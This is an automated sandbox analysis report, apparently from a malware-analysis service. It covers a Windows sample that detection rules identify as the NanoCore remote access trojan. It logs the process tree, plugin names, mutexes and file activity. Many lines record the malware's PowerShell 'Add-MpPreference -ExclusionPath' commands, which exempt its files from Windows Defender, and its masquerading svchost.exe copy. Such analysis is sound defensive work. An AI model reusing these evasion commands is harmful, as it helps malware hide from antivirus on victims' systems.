            Source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000A.00000002.522470362.0000000004578000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: s9SWgUgyO5.exe PID: 7060, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: s9SWgUgyO5.exe PID: 7060, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6376 -ip 6376
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_051BE471
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_051BE480
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_051BBBD4
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_06598B68
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_06597970
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_06598C26
            Source: s9SWgUgyO5.exe, 00000000.00000000.287469319.0000000003EC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAlienRunPE.exe6 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 00000000.00000000.270590323.0000000000C3A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameC vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEMIO Zuv.exe2 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILE vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 00000000.00000000.270897208.000000000131A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000000.265944509.00000000009EA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameC vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526244100.0000000007150000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameMyClientPlugin.dll@ vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.525611849.0000000006000000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526053509.0000000006E20000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526069628.0000000006E30000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526170898.0000000006FE0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameFileBrowserClient.dllT vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNanoCoreBase.dll< vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPlugin.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.522721839.00000000047BF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.522721839.00000000047BF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNAudio.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.522721839.00000000047BF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.525727173.0000000006300000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exe, 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs s9SWgUgyO5.exe
            Source: s9SWgUgyO5.exeBinary or memory string: OriginalFilenameC vs s9SWgUgyO5.exe
            Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
            Source: s9SWgUgyO5.exeMetadefender: Detection: 25%
            Source: s9SWgUgyO5.exeReversingLabs: Detection: 35%
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeFile read: C:\Users\user\Desktop\s9SWgUgyO5.exeJump to behavior
            Source: s9SWgUgyO5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\s9SWgUgyO5.exe 'C:\Users\user\Desktop\s9SWgUgyO5.exe'
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s9SWgUgyO5.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Users\user\Desktop\s9SWgUgyO5.exe C:\Users\user\Desktop\s9SWgUgyO5.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6376 -ip 6376
            Source: unknownProcess created: C:\Users\Public\Documents\???????????????\svchost.exe 'C:\Users\Public\Documents\???????????????\svchost.exe'
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 2576
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\Public\Documents\???????????????\svchost.exe 'C:\Users\Public\Documents\???????????????\svchost.exe'
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4956 -ip 4956
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 2184
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6728 -ip 6728
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 2600
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s9SWgUgyO5.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Users\user\Desktop\s9SWgUgyO5.exe C:\Users\user\Desktop\s9SWgUgyO5.exe
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 2576
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6376 -ip 6376
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4956 -ip 4956
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6728 -ip 6728
            Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 2184
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 2600
            Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
            Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeFile created: C:\Users\Public\Documents\???????????????Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rslbwbev.gpk.ps1Jump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@68/65@19/5
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\Public\Documents\???????????????\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\Public\Documents\???????????????\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6376
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:980:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4956
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6728
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4840:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_01
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{5fb3fc63-476b-43ac-865e-d84d77cfacac}
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Documents\???????????????\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Documents\???????????????\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Documents\???????????????\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Documents\???????????????\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
